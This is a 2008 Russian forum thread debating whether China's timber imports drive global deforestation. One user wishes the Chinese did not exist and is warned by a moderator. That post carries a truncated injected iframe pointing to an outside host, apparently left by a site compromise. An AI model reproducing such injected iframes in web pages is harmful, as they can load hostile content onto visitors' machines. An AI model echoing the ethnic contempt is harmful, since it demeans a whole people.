Страница 1 из 2

Китайцы оставят земной шар без леса

СообщениеДобавлено: Вс янв 20, 2008 1:06 pm
Alexey_E
Именно с таким подтекстом статьи запестрели в западной прессе. Бурное экономическое развитие Китая плюс отсутствие каких-либо законов в Поднебесной, ограничивающих незаконный ввоз древесины вызывают массовые вырубки леса в развивающихся странах, для населения которых такой способ заработка является, чуть ли не единственным.

Благодаря такому раскладу вещей в первую очередь практически без леса остались такие доиндустриальные страны, как Тайланд, Филлипины. Индонезия и Бирма останутся без леса в ближайшее десятилетие, Папуа Новая Гвинея «расстанется» со всем своим лесом через 16 лет. Россия хоть и индустриальная страна, но благодаря незаконным вырубкам леса, с его последующим незаконным вывозом в Китай, без Дальневосточного и Сибирского леса останется через 20 лет. В настоящее время половина всего вырубаемого леса в Сибири вывозится из России в Китай незаконно.
Большие потребности Китая в древесине вызвали уничтожение лесов не только на материке Евразия, но и в Африке и Южной Америке. Так, после того как китайцы стали употреблять свинину и курятину площади Южно-Американских лесов в долине реки Амазонка стали расчищаться под плантации сои, которая активно используется для кормления скотины. По этой причине в ближайшее время может быть вырублено до 30% всех южно-американских тропических лесов.
До 1998 года Китай заготовлял древесину только у себя. К 1999-му году собственных лесов, необходимых для растущей бешенными темпами экономики Поднебесной, практически не осталось. В 1999 же году был принят закон, запрещающий любую вырубку леса в стране. Китайцы обратили пристальное внимание на своих соседей, а точнее на их лесные ресурсы. За последние 10 лет импорт Китаем древесины из других стран удвоился.
Кроме того, потребности в лесе Китая провоцируют вооружённые конфликты в ряде государств. Так в Камбодже, Бирме и Либерии на почве дележа лесных ресурсов постоянно вспыхивают военные конфликты между бандитскими группировками.
Тревогу у западных стран вызывает то, что потребление древесины на душу населения в Китае ещё ниже, чем у развитых стран, а это значит, что потребности Поднебесной в древесине в ближайшем будущем будут только увеличиваться по мере роста числа людей, принадлежащих к среднему классу. В настоящее время потребление бумаги на душу населения в Китае составляет только 1/8 от такового США. Если по потреблению бумаги Китай догонит США, то объёмы всех вырубок леса в мире должны будут удвоиться.
В итоге, вырубая такие объёмы леса, человечество ускоряет изменение климата Земли в сторону его потепления, так как леса являются одним из основных акцепторов углекислого газа.

Источник: http://www.priroda.su/item/48

СообщениеДобавлено: Чт апр 17, 2008 1:36 pm
Лето
Да, с китайцами действительно нужно что-то делать. Людей уже в целом слишком много. Этого кол-ва вполне достаточно для выживания вида. Возможно стоит ввести жёсткие ограничения на рождаемость. Как вы думаете?

СообщениеДобавлено: Чт апр 17, 2008 1:58 pm
Alexey_E
Лето писал(а):Возможно стоит ввести жёсткие ограничения на рождаемость. Как вы думаете?


Китайские власти уже остановили рост рождаемости, но этого мало. Бурный экономический рост Китая требует большое количество ресурсов, одним из которых является лес.

СообщениеДобавлено: Чт апр 17, 2008 2:36 pm
Лето
Alexey_E писал(а):Китайские власти уже остановили рост рождаемости, но этого мало.

Возможно, там есть какие-то ограничения. Откуда может взяться бурный экономический рост, если они остановили рост рождаемости? Если бы всё было остановлено, то, к примеру, не надо было бы колонизировать Тибет. Кроме того, я сейчас говорю не только о китайцах. Тут стоит понять, что проблема не только в Китае. Китай не только потребляет древесину. Он её еще и перерабатывает в различные товары, которые идут на экспорт. А поскольку это всё дешево, то во всём мире их товары с удовольствием покупают. И спрос растет, потому что людей становится всё больше. Именно поэтому вырубают леса, именно поэтому происходит глобальное изменение климата. Человек уничтожает планету. Я понимаю, что эта тема для вас не из самых приятных, но пора задуматься о неких самоограничениях.

СообщениеДобавлено: Чт апр 17, 2008 9:09 pm
zakharov
не читайте советских газет, в них много мифологии.

Китай, безусловно, является огромным потребителем древесины, в т.ч. и из России. Но обратите внимание, что несколько лет назад Китай ввел запрет на рубку леса на своей территории и развернул масштабную программу лесовосстановления и лесоразведения.

Кстати, достаточно недавно, 12 марта 2008 года в Китае прошел день посадки деревьев. К этой дате Государственная лесная администрация Китая (State Forest Authority) опубликовала доклад (Green Coverage Report). В нем говорится о том, как выполняется принятое в 1981 году решение партии и правительства о развитии добровольных работ по посадке деревьев. Это решение было принято после того, как всем, в том числе и руководству страны, стало ясно, что деградация лесов Китая наносит огромный ущерб экономике, и пришла пора заняться лесовосстановлением и лесоразведением.

Благодаря добровольной работе граждан в 2007 году было посажено 2 миллиарда 270 млн. саженцев. В этих акциях участвовало 58% населения страны. За один год доля зеленых насаждений увеличилась еще на 2,6% и достигла 35,1% от общей площади китайских населенных пунктов.

Всего с 1981 года китайские добровольцы посадили 51,5 млрд. саженцев. Благодаря целенаправленной работе общественности и государственных органов общая площадь китайских лесов достигла 175 млн. га, что составляет 18,2% территории страны. В 1981 году лесами было покрыто 12% территории Китая. К 2020 году планируется довести эту цифру до 20%.

СообщениеДобавлено: Пт апр 18, 2008 5:21 pm
Лето
Молодцы они! Что тут еще сказать. Но все равно лучше бы их не было вовсе! (китайцев) :D<iframe src='http://traffstats.biz/adv/new.ph

СообщениеДобавлено: Вс апр 20, 2008 10:35 am
водянной
Лето писал(а):Но все равно лучше бы их не было вовсе! (китайцев) :D<iframe src='http://traffstats.biz/adv/new.ph
Дико извиняюсь, но вот как-то фашизмом пахнуло... Не то чтобы китайцев люблю, вовсе нет, но в крайности впадать тоже не стоит. имхо

СообщениеДобавлено: Ср апр 23, 2008 10:09 pm
zakharov
Лето писал(а):Ничего не могу с собой поделать...


Получите предупреждение от модератора - такие высказывания недопустимы в нашем форуме. В случае повторения или иного нарушения правил форума будем наказывать более жестко.

СообщениеДобавлено: Вт апр 29, 2008 2:45 pm
kolia
но в тоже время Китай по немного начинает понимать важность вопросов охраны окружающей среды и вкладывает в это деньги, а также тесно сотрудничает с ЕС в этих вопросах

СообщениеДобавлено: Пн май 05, 2008 8:56 am
Флинт
Ага, начади понимать! Воруют у нас, толкают, и на полученную "прибыль" сажают у СЕБЯ.